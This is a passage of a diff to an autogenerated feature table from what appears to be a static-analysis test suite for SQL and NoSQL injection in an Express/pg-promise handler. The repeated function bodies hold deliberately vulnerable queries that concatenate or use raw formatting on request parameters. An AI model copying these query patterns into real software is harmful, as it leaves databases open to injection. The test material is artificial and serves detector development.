req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:13:55:15 | req | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:13:55:15 | req | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:13:55:22 | req.params | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:13:55:22 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:13:55:22 | req.params | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:13:55:22 | req.params | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:13:55:22 | req.params | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:13:55:27 | req.params.name | CalleeFlexibleAccessPath | db.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:13:55:27 | req.params.name | InputAccessPathFromCallee | 0.values.name | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:13:55:27 | req.params.name | InputArgumentIndex | 0 | @@ -3848,6 +18707,41 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:13:55:27 | req.params.name | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:13:55:27 | req.params.name | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:13:55:27 | req.params.name | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:17:55:22 | params | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:17:55:22 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:17:55:22 | params | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:17:55:22 | params | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:17:55:22 | params | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:24:55:27 | name | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:24:55:27 | name | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:24:55:27 | name | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:24:55:27 | name | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:24:55:27 | name | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:7:56:11 | title | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:7:56:11 | title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:7:56:11 | title | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:7:56:11 | title | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:7:56:11 | title | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:7:56:29 | title: ... s.title | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:7:56:29 | title: ... s.title | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:7:56:29 | title: ... s.title | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:7:56:29 | title: ... s.title | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:7:56:29 | title: ... s.title | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:7:56:29 | title: ... s.title | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:7:56:29 | title: ... s.title | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:7:56:29 | title: ... s.title | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:7:56:29 | title: ... s.title | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:7:56:29 | title: ... s.title | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:14:56:16 | req | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:14:56:16 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:14:56:16 | req | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:14:56:16 | req | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:14:56:16 | req | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:14:56:23 | req.params | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:14:56:23 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:14:56:23 | req.params | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:14:56:23 | req.params | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:14:56:23 | req.params | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:14:56:29 | req.params.title | CalleeFlexibleAccessPath | db.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:14:56:29 | req.params.title | InputAccessPathFromCallee | 0.values.title | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:14:56:29 | req.params.title | InputArgumentIndex | 0 | @@ -3858,6 +18752,71 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:14:56:29 | req.params.title | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:14:56:29 | req.params.title | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:14:56:29 | req.params.title | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:18:56:23 | params | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:18:56:23 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:18:56:23 | params | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:18:56:23 | params | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:18:56:23 | params | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:25:56:29 | title | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:25:56:29 | title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:25:56:29 | title | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:25:56:29 | title | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:56:25:56:29 | title | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:3:59:4 | db | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:3:59:4 | db | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:3:59:4 | db | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:3:59:4 | db | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:3:59:4 | db | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:3:59:9 | db.task | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:3:59:9 | db.task | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:3:59:9 | db.task | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:3:59:9 | db.task | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:3:59:9 | db.task | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:3:61:4 | db.task ... OK\\n }) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:3:61:4 | db.task ... OK\\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:3:61:4 | db.task ... OK\\n }) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:3:61:4 | db.task ... OK\\n }) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:3:61:4 | db.task ... OK\\n }) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:3:61:4 | exceptional return of db.task ... OK\\n }) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:3:61:4 | exceptional return of db.task ... OK\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:3:61:4 | exceptional return of db.task ... OK\\n }) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:3:61:4 | exceptional return of db.task ... OK\\n }) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:3:61:4 | exceptional return of db.task ... OK\\n }) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:6:59:9 | task | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:6:59:9 | task | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:6:59:9 | task | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:6:59:9 | task | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:6:59:9 | task | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:59:10 | query | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:59:10 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:59:10 | query | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:59:10 | query | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:59:10 | query | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:59:11 | t | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:59:11 | t | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:59:11 | t | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:59:11 | t | contextSurroundingFunctionParameters | (req, res)\n(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:59:11 | t | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:59:11 | t | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:59:11 | t | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:59:11 | t | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:59:11 | t | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:59:11 | t | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:61:3 | 'arguments' object of anonymous function | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:61:3 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:61:3 | 'arguments' object of anonymous function | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:61:3 | 'arguments' object of anonymous function | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:61:3 | 'arguments' 